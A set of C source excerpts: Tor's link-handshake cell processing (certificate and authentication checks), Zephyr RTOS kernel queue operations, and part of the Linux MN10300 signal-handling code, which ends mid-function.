tor_addr_from_ipv4n(&my_apparent_addr, get_uint32(my_addr_ptr)); } else if (my_addr_type == RESOLVED_TYPE_IPV6 && my_addr_len == 16) { tor_addr_from_ipv6_bytes(&my_apparent_addr, (const char *) my_addr_ptr); } n_other_addrs = (uint8_t) *cp++; while (n_other_addrs && cp < end-2) { /* Consider all the other addresses; if any matches, this connection is * "canonical." */ tor_addr_t addr; const uint8_t *next = decode_address_from_payload(&addr, cp, (int)(end-cp)); if (next == NULL) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Bad address in netinfo cell; closing connection."); connection_or_close_for_error(conn, 0); return; } if (tor_addr_eq(&addr, &(conn->real_addr))) { conn->is_canonical = 1; break; } cp = next; --n_other_addrs; } /* Act on apparent skew. */ /** Warn when we get a netinfo skew with at least this value. */ #define NETINFO_NOTICE_SKEW 3600 if (labs(apparent_skew) > NETINFO_NOTICE_SKEW && router_get_by_id_digest(conn->identity_digest)) { char dbuf[64]; int severity; /*XXXX be smarter about when everybody says we are skewed. */ if (router_digest_is_trusted_dir(conn->identity_digest)) severity = LOG_WARN; else severity = LOG_INFO; format_time_interval(dbuf, sizeof(dbuf), apparent_skew); log_fn(severity, LD_GENERAL, "Received NETINFO cell with skewed time from " "server at %s:%d. It seems that our clock is %s by %s, or " "that theirs is %s. Tor requires an accurate clock to work: " "please check your time and date settings.", conn->base_.address, (int)(conn->base_.port), apparent_skew > 0 ? "ahead" : "behind", dbuf, apparent_skew > 0 ? "behind" : "ahead"); if (severity == LOG_WARN) /* only tell the controller if an authority */ control_event_general_status(LOG_WARN, "CLOCK_SKEW SKEW=%ld SOURCE=OR:%s:%d", apparent_skew, conn->base_.address, conn->base_.port); } /* XXX maybe act on my_apparent_addr, if the source is sufficiently * trustworthy. */ if (! conn->handshake_state->sent_netinfo) { /* If we were prepared to authenticate, but we never got an AUTH_CHALLENGE * cell, then we would not previously have sent a NETINFO cell. Do so * now. */ if (connection_or_send_netinfo(conn) < 0) { connection_or_close_for_error(conn, 0); return; } } if (connection_or_set_state_open(conn) < 0) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Got good NETINFO cell from %s:%d; but " "was unable to make the OR connection become open.", safe_str_client(conn->base_.address), conn->base_.port); connection_or_close_for_error(conn, 0); } else { log_info(LD_OR, "Got good NETINFO cell from %s:%d; OR connection is now " "open, using protocol version %d. Its ID digest is %s. " "Our address is apparently %s.", safe_str_client(conn->base_.address), conn->base_.port, (int)(conn->link_proto), hex_str(chan->identity_digest, DIGEST_LEN), tor_addr_is_null(&my_apparent_addr) ? "<none>" : fmt_and_decorate_addr(&my_apparent_addr)); } assert_connection_ok(TO_CONN(conn),time(NULL)); } /** * Process a CERTS cell from a channel. * * This function is called to process an incoming CERTS cell on a * channel_tls_t: * * If the other side should not have sent us a CERTS cell, or the cell is * malformed, or it is supposed to authenticate the TLS key but it doesn't, * then mark the connection. * * If the cell has a good cert chain and we're doing a v3 handshake, then * store the certificates in or_handshake_state. If this is the client side * of the connection, we then authenticate the server or mark the connection. * If it's the server side, wait for an AUTHENTICATE cell. */ static void channel_tls_process_certs_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn) { tor_cert_t *link_cert = NULL; tor_cert_t *id_cert = NULL; tor_cert_t *auth_cert = NULL; uint8_t *ptr; int n_certs, i; int send_netinfo = 0; tor_assert(cell); tor_assert(chan); tor_assert(conn); #define ERR(s) \ do { \ log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, \ "Received a bad CERTS cell from %s:%d: %s", \ safe_str(conn->base_.address), \ conn->base_.port, (s)); \ connection_or_close_for_error(conn, 0); \ goto err; \ } while (0) if (conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V3) ERR("We're not doing a v3 handshake!"); if (conn->link_proto < 3) ERR("We're not using link protocol >= 3"); if (conn->handshake_state->received_certs_cell) ERR("We already got one"); if (conn->handshake_state->authenticated) { /* Should be unreachable, but let's make sure. */ ERR("We're already authenticated!"); } if (cell->payload_len < 1) ERR("It had no body"); if (cell->circ_id) ERR("It had a nonzero circuit ID"); n_certs = cell->payload[0]; ptr = cell->payload + 1; for (i = 0; i < n_certs; ++i) { uint8_t cert_type; uint16_t cert_len; if (ptr + 3 > cell->payload + cell->payload_len) { goto truncated; } cert_type = *ptr; cert_len = ntohs(get_uint16(ptr+1)); if (ptr + 3 + cert_len > cell->payload + cell->payload_len) { goto truncated; } if (cert_type == OR_CERT_TYPE_TLS_LINK || cert_type == OR_CERT_TYPE_ID_1024 || cert_type == OR_CERT_TYPE_AUTH_1024) { tor_cert_t *cert = tor_cert_decode(ptr + 3, cert_len); if (!cert) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received undecodable certificate in CERTS cell from %s:%d", safe_str(conn->base_.address), conn->base_.port); } else { if (cert_type == OR_CERT_TYPE_TLS_LINK) { if (link_cert) { tor_cert_free(cert); ERR("Too many TLS_LINK certificates"); } link_cert = cert; } else if (cert_type == OR_CERT_TYPE_ID_1024) { if (id_cert) { tor_cert_free(cert); ERR("Too many ID_1024 certificates"); } id_cert = cert; } else if (cert_type == OR_CERT_TYPE_AUTH_1024) { if (auth_cert) { tor_cert_free(cert); ERR("Too many AUTH_1024 certificates"); } auth_cert = cert; } else { tor_cert_free(cert); } } } ptr += 3 + cert_len; continue; truncated: ERR("It ends in the middle of a certificate"); } if (conn->handshake_state->started_here) { int severity; if (! (id_cert && link_cert)) ERR("The certs we wanted were missing"); /* Okay. We should be able to check the certificates now. */ if (! tor_tls_cert_matches_key(conn->tls, link_cert)) { ERR("The link certificate didn't match the TLS public key"); } /* Note that this warns more loudly about time and validity if we were * _trying_ to connect to an authority, not necessarily if we _did_ connect * to one. */ if (router_digest_is_trusted_dir( chan->identity_digest)) severity = LOG_WARN; else severity = LOG_PROTOCOL_WARN; if (! tor_tls_cert_is_valid(severity, link_cert, id_cert, 0)) ERR("The link certificate was not valid"); if (! tor_tls_cert_is_valid(severity, id_cert, id_cert, 1)) ERR("The ID certificate was not valid"); conn->handshake_state->authenticated = 1; { const digests_t *id_digests = tor_cert_get_id_digests(id_cert); crypto_pk_t *identity_rcvd; if (!id_digests) ERR("Couldn't compute digests for key in ID cert"); identity_rcvd = tor_tls_cert_get_key(id_cert); if (!identity_rcvd) ERR("Internal error: Couldn't get RSA key from ID cert."); memcpy(conn->handshake_state->authenticated_peer_id, id_digests->d[DIGEST_SHA1], DIGEST_LEN); channel_set_circid_type(chan, identity_rcvd, conn->link_proto < MIN_LINK_PROTO_FOR_WIDE_CIRC_IDS); crypto_pk_free(identity_rcvd); } if (connection_or_client_learned_peer_id(conn, conn->handshake_state->authenticated_peer_id) < 0) ERR("Problem setting or checking peer id"); log_info(LD_OR, "Got some good certificates from %s:%d: Authenticated it.", safe_str(conn->base_.address), conn->base_.port); conn->handshake_state->id_cert = id_cert; id_cert = NULL; if (!public_server_mode(get_options())) { /* If we initiated the connection and we are not a public server, we * aren't planning to authenticate at all. At this point we know who we * are talking to, so we can just send a netinfo now. */ send_netinfo = 1; } } else { if (! (id_cert && auth_cert)) ERR("The certs we wanted were missing"); /* Remember these certificates so we can check an AUTHENTICATE cell */ if (! tor_tls_cert_is_valid(LOG_PROTOCOL_WARN, auth_cert, id_cert, 1)) ERR("The authentication certificate was not valid"); if (! tor_tls_cert_is_valid(LOG_PROTOCOL_WARN, id_cert, id_cert, 1)) ERR("The ID certificate was not valid"); log_info(LD_OR, "Got some good certificates from %s:%d: " "Waiting for AUTHENTICATE.", safe_str(conn->base_.address), conn->base_.port); /* XXXX check more stuff? */ conn->handshake_state->id_cert = id_cert; conn->handshake_state->auth_cert = auth_cert; id_cert = auth_cert = NULL; } conn->handshake_state->received_certs_cell = 1; if (send_netinfo) { if (connection_or_send_netinfo(conn) < 0) { log_warn(LD_OR, "Couldn't send netinfo cell"); connection_or_close_for_error(conn, 0); goto err; } } err: tor_cert_free(id_cert); tor_cert_free(link_cert); tor_cert_free(auth_cert); #undef ERR } /** * Process an AUTH_CHALLENGE cell from a channel_tls_t * * This function is called to handle an incoming AUTH_CHALLENGE cell on a * channel_tls_t; if we weren't supposed to get one (for example, because we're * not the originator of the channel), or it's ill-formed, or we aren't doing * a v3 handshake, mark the channel. If the cell is well-formed but we don't * want to authenticate, just drop it. If the cell is well-formed *and* we * want to authenticate, send an AUTHENTICATE cell and then a NETINFO cell. */ static void channel_tls_process_auth_challenge_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn) { int n_types, i, use_type = -1; uint8_t *cp; tor_assert(cell); tor_assert(chan); tor_assert(conn); #define ERR(s) \ do { \ log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, \ "Received a bad AUTH_CHALLENGE cell from %s:%d: %s", \ safe_str(conn->base_.address), \ conn->base_.port, (s)); \ connection_or_close_for_error(conn, 0); \ return; \ } while (0) if (conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V3) ERR("We're not currently doing a v3 handshake"); if (conn->link_proto < 3) ERR("We're not using link protocol >= 3"); if (!(conn->handshake_state->started_here)) ERR("We didn't originate this connection"); if (conn->handshake_state->received_auth_challenge) ERR("We already received one"); if (!(conn->handshake_state->received_certs_cell)) ERR("We haven't gotten a CERTS cell yet"); if (cell->payload_len < OR_AUTH_CHALLENGE_LEN + 2) ERR("It was too short"); if (cell->circ_id) ERR("It had a nonzero circuit ID"); n_types = ntohs(get_uint16(cell->payload + OR_AUTH_CHALLENGE_LEN)); if (cell->payload_len < OR_AUTH_CHALLENGE_LEN + 2 + 2*n_types) ERR("It looks truncated"); /* Now see if there is an authentication type we can use */ cp = cell->payload+OR_AUTH_CHALLENGE_LEN + 2; for (i = 0; i < n_types; ++i, cp += 2) { uint16_t authtype = ntohs(get_uint16(cp)); if (authtype == AUTHTYPE_RSA_SHA256_TLSSECRET) use_type = authtype; } conn->handshake_state->received_auth_challenge = 1; if (! public_server_mode(get_options())) { /* If we're not a public server then we don't want to authenticate on a connection we originated, and we already sent a NETINFO cell when we got the CERTS cell. We have nothing more to do. */ return; } if (use_type >= 0) { log_info(LD_OR, "Got an AUTH_CHALLENGE cell from %s:%d: Sending " "authentication", safe_str(conn->base_.address), conn->base_.port); if (connection_or_send_authenticate_cell(conn, use_type) < 0) { log_warn(LD_OR, "Couldn't send authenticate cell"); connection_or_close_for_error(conn, 0); return; } } else { log_info(LD_OR, "Got an AUTH_CHALLENGE cell from %s:%d, but we don't " "know any of its authentication types. Not authenticating.", safe_str(conn->base_.address), conn->base_.port); } if (connection_or_send_netinfo(conn) < 0) { log_warn(LD_OR, "Couldn't send netinfo cell"); connection_or_close_for_error(conn, 0); return; } #undef ERR } /** * Process an AUTHENTICATE cell from a channel_tls_t * * If it's ill-formed or we weren't supposed to get one or we're not doing a * v3 handshake, then mark the connection. If it does not authenticate the * other side of the connection successfully (because it isn't signed right, * we didn't get a CERTS cell, etc) mark the connection. Otherwise, accept * the identity of the router on the other side of the connection. */ static void channel_tls_process_authenticate_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn) { uint8_t expected[V3_AUTH_FIXED_PART_LEN]; const uint8_t *auth; int authlen; tor_assert(cell); tor_assert(chan); tor_assert(conn); #define ERR(s) \ do { \ log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, \ "Received a bad AUTHENTICATE cell from %s:%d: %s", \ safe_str(conn->base_.address), \ conn->base_.port, (s)); \ connection_or_close_for_error(conn, 0); \ return; \ } while (0) if (conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V3) ERR("We're not doing a v3 handshake"); if (conn->link_proto < 3) ERR("We're not using link protocol >= 3"); if (conn->handshake_state->started_here) ERR("We originated this connection"); if (conn->handshake_state->received_authenticate) ERR("We already got one!"); if (conn->handshake_state->authenticated) { /* Should be impossible given other checks */ ERR("The peer is already authenticated"); } if (!(conn->handshake_state->received_certs_cell)) ERR("We never got a certs cell"); if (conn->handshake_state->auth_cert == NULL) ERR("We never got an authentication certificate"); if (conn->handshake_state->id_cert == NULL) ERR("We never got an identity certificate"); if (cell->payload_len < 4) ERR("Cell was way too short"); auth = cell->payload; { uint16_t type = ntohs(get_uint16(auth)); uint16_t len = ntohs(get_uint16(auth+2)); if (4 + len > cell->payload_len) ERR("Authenticator was truncated"); if (type != AUTHTYPE_RSA_SHA256_TLSSECRET) ERR("Authenticator type was not recognized"); auth += 4; authlen = len; } if (authlen < V3_AUTH_BODY_LEN + 1) ERR("Authenticator was too short"); if (connection_or_compute_authenticate_cell_body( conn, expected, sizeof(expected), NULL, 1) < 0) ERR("Couldn't compute expected AUTHENTICATE cell body"); if (tor_memneq(expected, auth, sizeof(expected))) ERR("Some field in the AUTHENTICATE cell body was not as expected"); { crypto_pk_t *pk = tor_tls_cert_get_key( conn->handshake_state->auth_cert); char d[DIGEST256_LEN]; char *signed_data; size_t keysize; int signed_len; if (!pk) ERR("Internal error: couldn't get RSA key from AUTH cert."); crypto_digest256(d, (char*)auth, V3_AUTH_BODY_LEN, DIGEST_SHA256); keysize = crypto_pk_keysize(pk); signed_data = tor_malloc(keysize); signed_len = crypto_pk_public_checksig(pk, signed_data, keysize, (char*)auth + V3_AUTH_BODY_LEN, authlen - V3_AUTH_BODY_LEN); crypto_pk_free(pk); if (signed_len < 0) { tor_free(signed_data); ERR("Signature wasn't valid"); } if (signed_len < DIGEST256_LEN) { tor_free(signed_data); ERR("Not enough data was signed"); } /* Note that we deliberately allow *more* than DIGEST256_LEN bytes here, * in case they're later used to hold a SHA3 digest or something. */ if (tor_memneq(signed_data, d, DIGEST256_LEN)) { tor_free(signed_data); ERR("Signature did not match data to be signed."); } tor_free(signed_data); } /* Okay, we are authenticated. */ conn->handshake_state->received_authenticate = 1; conn->handshake_state->authenticated = 1; conn->handshake_state->digest_received_data = 0; { crypto_pk_t *identity_rcvd = tor_tls_cert_get_key(conn->handshake_state->id_cert); const digests_t *id_digests = tor_cert_get_id_digests(conn->handshake_state->id_cert); /* This must exist; we checked key type when reading the cert. */ tor_assert(id_digests); memcpy(conn->handshake_state->authenticated_peer_id, id_digests->d[DIGEST_SHA1], DIGEST_LEN); channel_set_circid_type(chan, identity_rcvd, conn->link_proto < MIN_LINK_PROTO_FOR_WIDE_CIRC_IDS); crypto_pk_free(identity_rcvd); connection_or_init_conn_from_address(conn, &(conn->base_.addr), conn->base_.port, (const char*)(conn->handshake_state-> authenticated_peer_id), 0); log_info(LD_OR, "Got an AUTHENTICATE cell from %s:%d: Looks good.", safe_str(conn->base_.address), conn->base_.port); } #undef ERR }
259454.c
/* * Copyright (c) 2010-2016 Wind River Systems, Inc. * * SPDX-License-Identifier: Apache-2.0 */ /** * @file * * @brief dynamic-size QUEUE object. */ #include <kernel.h> #include <kernel_structs.h> #include <toolchain.h> #include <wait_q.h> #include <ksched.h> #include <init.h> #include <syscall_handler.h> #include <kernel_internal.h> #include <sys/check.h> struct alloc_node { sys_sfnode_t node; void *data; }; void *z_queue_node_peek(sys_sfnode_t *node, bool needs_free) { void *ret; if ((node != NULL) && (sys_sfnode_flags_get(node) != (uint8_t)0)) { /* If the flag is set, then the enqueue operation for this item * did a behind-the scenes memory allocation of an alloc_node * struct, which is what got put in the queue. Free it and pass * back the data pointer. */ struct alloc_node *anode; anode = CONTAINER_OF(node, struct alloc_node, node); ret = anode->data; if (needs_free) { k_free(anode); } } else { /* Data was directly placed in the queue, the first word * reserved for the linked list. User mode isn't allowed to * do this, although it can get data sent this way. */ ret = (void *)node; } return ret; } void z_impl_k_queue_init(struct k_queue *queue) { sys_sflist_init(&queue->data_q); queue->lock = (struct k_spinlock) {}; z_waitq_init(&queue->wait_q); #if defined(CONFIG_POLL) sys_dlist_init(&queue->poll_events); #endif SYS_PORT_TRACING_OBJ_INIT(k_queue, queue); z_object_init(queue); } #ifdef CONFIG_USERSPACE static inline void z_vrfy_k_queue_init(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ_NEVER_INIT(queue, K_OBJ_QUEUE)); z_impl_k_queue_init(queue); } #include <syscalls/k_queue_init_mrsh.c> #endif static void prepare_thread_to_run(struct k_thread *thread, void *data) { z_thread_return_value_set_with_data(thread, 0, data); z_ready_thread(thread); } static inline void handle_poll_events(struct k_queue *queue, uint32_t state) { #ifdef CONFIG_POLL z_handle_obj_poll_events(&queue->poll_events, state); #endif } void z_impl_k_queue_cancel_wait(struct k_queue *queue) { SYS_PORT_TRACING_OBJ_FUNC(k_queue, cancel_wait, queue); k_spinlock_key_t key = k_spin_lock(&queue->lock); struct k_thread *first_pending_thread; first_pending_thread = z_unpend_first_thread(&queue->wait_q); if (first_pending_thread != NULL) { prepare_thread_to_run(first_pending_thread, NULL); } handle_poll_events(queue, K_POLL_STATE_CANCELLED); z_reschedule(&queue->lock, key); } #ifdef CONFIG_USERSPACE static inline void z_vrfy_k_queue_cancel_wait(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); z_impl_k_queue_cancel_wait(queue); } #include <syscalls/k_queue_cancel_wait_mrsh.c> #endif static int32_t queue_insert(struct k_queue *queue, void *prev, void *data, bool alloc, bool is_append) { struct k_thread *first_pending_thread; k_spinlock_key_t key = k_spin_lock(&queue->lock); SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, queue_insert, queue, alloc); if (is_append) { prev = sys_sflist_peek_tail(&queue->data_q); } first_pending_thread = z_unpend_first_thread(&queue->wait_q); if (first_pending_thread != NULL) { SYS_PORT_TRACING_OBJ_FUNC_BLOCKING(k_queue, queue_insert, queue, alloc, K_FOREVER); prepare_thread_to_run(first_pending_thread, data); z_reschedule(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, queue_insert, queue, alloc, 0); return 0; } /* Only need to actually allocate if no threads are pending */ if (alloc) { struct alloc_node *anode; anode = z_thread_malloc(sizeof(*anode)); if (anode == NULL) { k_spin_unlock(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, queue_insert, queue, alloc, -ENOMEM); return -ENOMEM; } anode->data = data; sys_sfnode_init(&anode->node, 0x1); data = anode; } else { sys_sfnode_init(data, 0x0); } SYS_PORT_TRACING_OBJ_FUNC_BLOCKING(k_queue, queue_insert, queue, alloc, K_FOREVER); sys_sflist_insert(&queue->data_q, prev, data); handle_poll_events(queue, K_POLL_STATE_DATA_AVAILABLE); z_reschedule(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, queue_insert, queue, alloc, 0); return 0; } void k_queue_insert(struct k_queue *queue, void *prev, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, insert, queue); (void)queue_insert(queue, prev, data, false, false); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, insert, queue); } void k_queue_append(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, append, queue); (void)queue_insert(queue, NULL, data, false, true); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, append, queue); } void k_queue_prepend(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, prepend, queue); (void)queue_insert(queue, NULL, data, false, false); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, prepend, queue); } int32_t z_impl_k_queue_alloc_append(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, alloc_append, queue); int32_t ret = queue_insert(queue, NULL, data, true, true); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, alloc_append, queue, ret); return ret; } #ifdef CONFIG_USERSPACE static inline int32_t z_vrfy_k_queue_alloc_append(struct k_queue *queue, void *data) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_alloc_append(queue, data); } #include <syscalls/k_queue_alloc_append_mrsh.c> #endif int32_t z_impl_k_queue_alloc_prepend(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, alloc_prepend, queue); int32_t ret = queue_insert(queue, NULL, data, true, false); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, alloc_prepend, queue, ret); return ret; } #ifdef CONFIG_USERSPACE static inline int32_t z_vrfy_k_queue_alloc_prepend(struct k_queue *queue, void *data) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_alloc_prepend(queue, data); } #include <syscalls/k_queue_alloc_prepend_mrsh.c> #endif int k_queue_append_list(struct k_queue *queue, void *head, void *tail) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, append_list, queue); /* invalid head or tail of list */ CHECKIF(head == NULL || tail == NULL) { SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, append_list, queue, -EINVAL); return -EINVAL; } k_spinlock_key_t key = k_spin_lock(&queue->lock); struct k_thread *thread = NULL; if (head != NULL) { thread = z_unpend_first_thread(&queue->wait_q); } while ((head != NULL) && (thread != NULL)) { prepare_thread_to_run(thread, head); head = *(void **)head; thread = z_unpend_first_thread(&queue->wait_q); } if (head != NULL) { sys_sflist_append_list(&queue->data_q, head, tail); } SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, append_list, queue, 0); handle_poll_events(queue, K_POLL_STATE_DATA_AVAILABLE); z_reschedule(&queue->lock, key); return 0; } int k_queue_merge_slist(struct k_queue *queue, sys_slist_t *list) { int ret; SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, merge_slist, queue); /* list must not be empty */ CHECKIF(sys_slist_is_empty(list)) { SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, merge_slist, queue, -EINVAL); return -EINVAL; } /* * note: this works as long as: * - the slist implementation keeps the next pointer as the first * field of the node object type * - list->tail->next = NULL. * - sflist implementation only differs from slist by stuffing * flag bytes in the lower order bits of the data pointer * - source list is really an slist and not an sflist with flags set */ ret = k_queue_append_list(queue, list->head, list->tail); CHECKIF(ret != 0) { SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, merge_slist, queue, ret); return ret; } sys_slist_init(list); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, merge_slist, queue, 0); return 0; } void *z_impl_k_queue_get(struct k_queue *queue, k_timeout_t timeout) { k_spinlock_key_t key = k_spin_lock(&queue->lock); void *data; SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, get, queue, timeout); if (likely(!sys_sflist_is_empty(&queue->data_q))) { sys_sfnode_t *node; node = sys_sflist_get_not_empty(&queue->data_q); data = z_queue_node_peek(node, true); k_spin_unlock(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, get, queue, timeout, data); return data; } SYS_PORT_TRACING_OBJ_FUNC_BLOCKING(k_queue, get, queue, timeout); if (K_TIMEOUT_EQ(timeout, K_NO_WAIT)) { k_spin_unlock(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, get, queue, timeout, NULL); return NULL; } int ret = z_pend_curr(&queue->lock, key, &queue->wait_q, timeout); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, get, queue, timeout, (ret != 0) ? NULL : _current->base.swap_data); return (ret != 0) ? NULL : _current->base.swap_data; } bool k_queue_remove(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, remove, queue); bool ret = sys_sflist_find_and_remove(&queue->data_q, (sys_sfnode_t *)data); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, remove, queue, ret); return ret; } bool k_queue_unique_append(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, unique_append, queue); sys_sfnode_t *test; SYS_SFLIST_FOR_EACH_NODE(&queue->data_q, test) { if (test == (sys_sfnode_t *) data) { SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, unique_append, queue, false); return false; } } k_queue_append(queue, data); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, unique_append, queue, true); return true; } void *z_impl_k_queue_peek_head(struct k_queue *queue) { void *ret = z_queue_node_peek(sys_sflist_peek_head(&queue->data_q), false); SYS_PORT_TRACING_OBJ_FUNC(k_queue, peek_head, queue, ret); return ret; } void *z_impl_k_queue_peek_tail(struct k_queue *queue) { void *ret = z_queue_node_peek(sys_sflist_peek_tail(&queue->data_q), false); SYS_PORT_TRACING_OBJ_FUNC(k_queue, peek_tail, queue, ret); return ret; } #ifdef CONFIG_USERSPACE static inline void *z_vrfy_k_queue_get(struct k_queue *queue, k_timeout_t timeout) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_get(queue, timeout); } #include <syscalls/k_queue_get_mrsh.c> static inline int z_vrfy_k_queue_is_empty(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_is_empty(queue); } #include <syscalls/k_queue_is_empty_mrsh.c> static inline void *z_vrfy_k_queue_peek_head(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_peek_head(queue); } #include <syscalls/k_queue_peek_head_mrsh.c> static inline void *z_vrfy_k_queue_peek_tail(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_peek_tail(queue); } #include <syscalls/k_queue_peek_tail_mrsh.c> #endif /* CONFIG_USERSPACE */
571419.c
/* MN10300 Signal handling * * Copyright (C) 2007 Red Hat, Inc. All Rights Reserved. * Written by David Howells (dhowells@redhat.com) * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public Licence * as published by the Free Software Foundation; either version * 2 of the Licence, or (at your option) any later version. */ #include <linux/sched.h> #include <linux/mm.h> #include <linux/smp.h> #include <linux/kernel.h> #include <linux/signal.h> #include <linux/errno.h> #include <linux/wait.h> #include <linux/ptrace.h> #include <linux/unistd.h> #include <linux/stddef.h> #include <linux/tty.h> #include <linux/personality.h> #include <linux/suspend.h> #include <linux/tracehook.h> #include <asm/cacheflush.h> #include <asm/ucontext.h> #include <asm/uaccess.h> #include <asm/fpu.h> #include "sigframe.h" #define DEBUG_SIG 0 /* * atomically swap in the new signal mask, and wait for a signal. */ asmlinkage long sys_sigsuspend(int history0, int history1, old_sigset_t mask) { sigset_t blocked; siginitset(&blocked, mask); return sigsuspend(&blocked); } /* * set signal action syscall */ asmlinkage long sys_sigaction(int sig, const struct old_sigaction __user *act, struct old_sigaction __user *oact) { struct k_sigaction new_ka, old_ka; int ret; if (act) { old_sigset_t mask; if (verify_area(VERIFY_READ, act, sizeof(*act)) || __get_user(new_ka.sa.sa_handler, &act->sa_handler) || __get_user(new_ka.sa.sa_restorer, &act->sa_restorer) || __get_user(new_ka.sa.sa_flags, &act->sa_flags) || __get_user(mask, &act->sa_mask)) return -EFAULT; siginitset(&new_ka.sa.sa_mask, mask); } ret = do_sigaction(sig, act ? &new_ka : NULL, oact ? &old_ka : NULL); if (!ret && oact) { if (verify_area(VERIFY_WRITE, oact, sizeof(*oact)) || __put_user(old_ka.sa.sa_handler, &oact->sa_handler) || __put_user(old_ka.sa.sa_restorer, &oact->sa_restorer) || __put_user(old_ka.sa.sa_flags, &oact->sa_flags) || __put_user(old_ka.sa.sa_mask.sig[0], &oact->sa_mask)) return -EFAULT; } return ret; } /* * set alternate signal stack syscall */ asmlinkage long sys_sigaltstack(const stack_t __user *uss, stack_t *uoss) { return do_sigaltstack(uss, uoss, current_frame()->sp); } /* * do a signal return; undo the signal stack. */ static int restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, long *_d0) { unsigned int err = 0; /* Always make any pending restarted system calls return -EINTR */ current_thread_info()->restart_block.fn = do_no_restart_syscall; if (is_using_fpu(current)) fpu_kill_state(current); #define COPY(x) err |= __get_user(regs->x, &sc->x) COPY(d1); COPY(d2); COPY(d3); COPY(a0); COPY(a1); COPY(a2); COPY(a3); COPY(e0); COPY(e1); COPY(e2); COPY(e3); COPY(e4); COPY(e5); COPY(e6); COPY(e7); COPY(lar); COPY(lir); COPY(mdr); COPY(mdrq); COPY(mcvf); COPY(mcrl); COPY(mcrh); COPY(sp); COPY(pc); #undef COPY { unsigned int tmpflags; #ifndef CONFIG_MN10300_USING_JTAG #define USER_EPSW (EPSW_FLAG_Z | EPSW_FLAG_N | EPSW_FLAG_C | EPSW_FLAG_V | \ EPSW_T | EPSW_nAR) #else #define USER_EPSW (EPSW_FLAG_Z | EPSW_FLAG_N | EPSW_FLAG_C | EPSW_FLAG_V | \ EPSW_nAR) #endif err |= __get_user(tmpflags, &sc->epsw); regs->epsw = (regs->epsw & ~USER_EPSW) | (tmpflags & USER_EPSW); regs->orig_d0 = -1; /* disable syscall checks */ } { struct fpucontext *buf; err |= __get_user(buf, &sc->fpucontext); if (buf) { if (verify_area(VERIFY_READ, buf, sizeof(*buf))) goto badframe; err |= fpu_restore_sigcontext(buf); } } err |= __get_user(*_d0, &sc->d0); return err; badframe: return 1; } /* * standard signal return syscall */ asmlinkage long sys_sigreturn(void) { struct sigframe __user *frame; sigset_t set; long d0; frame = (struct sigframe __user *) current_frame()->sp; if (verify_area(VERIFY_READ, frame, sizeof(*frame))) goto badframe; if (__get_user(set.sig[0], &frame->sc.oldmask)) goto badframe; if (_NSIG_WORDS > 1 && __copy_from_user(&set.sig[1], &frame->extramask, sizeof(frame->extramask))) goto badframe; set_current_blocked(&set); if (restore_sigcontext(current_frame(), &frame->sc, &d0)) goto badframe; return d0; badframe: force_sig(SIGSEGV, current); return 0; } /* * realtime signal return syscall */ asmlinkage long sys_rt_sigreturn(void) { struct rt_sigframe __user *frame; sigset_t set; long d0; frame = (struct rt_sigframe __user 